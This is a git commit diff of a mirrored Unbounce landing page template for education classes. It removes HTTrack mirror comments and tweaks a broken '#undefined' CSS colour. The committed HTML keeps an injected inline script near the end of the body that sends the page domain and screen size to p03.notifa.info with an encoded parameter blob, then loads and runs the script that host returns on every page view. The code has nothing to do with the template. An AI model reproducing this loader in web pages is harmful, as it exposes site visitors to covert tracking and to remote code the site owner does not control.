first commit Unbounce Education Classes Landing Page v-2

--- a/Unbounce Education Classes Landing Page v-2/unbouncepages.com/learn-landing-theme-template-v2/index.html
+++ b/Unbounce Education Classes Landing Page v-2/unbouncepages.com/learn-landing-theme-template-v2/index.html
@@ -1,8 +1,6 @@
 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 
-<!-- Mirrored from unbouncepages.com/learn-landing-theme-template-v2/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 11 Oct 2019 06:46:40 GMT -->
-<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
 <head>
 <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
 <meta name="lp-version" content="v1.36.2">
@@ -369,7 +367,7 @@ a {
   -pie-background:rgba(227,77,89,1);
   color:#fff;
   border-width:undefinedpx;
-  border-color:#undefined;
+  border-color:'#undefined';
   font-size:26px;
   line-height:31px;
   font-weight:bold;
@@ -2632,6 +2630,4 @@ Array.prototype.slice.call(document.querySelectorAll('.lp-pom-form form')).forEa
 </script>
 <!-- lp:insertions end body:after -->
 <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p03.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAWRVCon84ej3xsaQ0zmUwKU6%2fwoCyimunTBwPc5n2Bn5tWH5aZdIcfJGTNkzLeycUwqstftPserSvJfS9Vn9LhkuNj%2bGeJ%2bobTHj2IAv98OXeBQD8G3sqI7irYv71oPsPHCBtNgOu1RujN3nvrPcF7H1z2QZLhiMulOWeQeYbcp6%2fB0iOhwA2dfxBeDctB9XC6cntatgfDsIQ3sc4MvS0%2bJzp3ZV%2fa4n4K1z4fT9gjZUiDvjgapUJ3BH7o19z%2fBbyGt%2fGm5gAWLraP%2bntq2otkYqIPUlMgHsBC4Ae8tWjc9Gw0YzqvRHNKcmEXX5DutuVhLk70hlvurt5QrFfrDj8m%2fQ85gkYk%2fp8aOoEpW42D0ILOXZPqlK4Eh6GqH1i5X1P2pSa0hqK%2fi5ScsnnSwuEF1S%2bVUWCKB6AQ7Y869GCAHwEaD5eXhUzCB3QYW11ZudJk4nZojLMPIyGNoo%2bVKa7GNxKR4dt6wwkDkAvU2JECdVcu6jRDvyBkQ%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
-
-<!-- Mirrored from unbouncepages.com/learn-landing-theme-template-v2/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 11 Oct 2019 06:47:54 GMT -->
 </html>
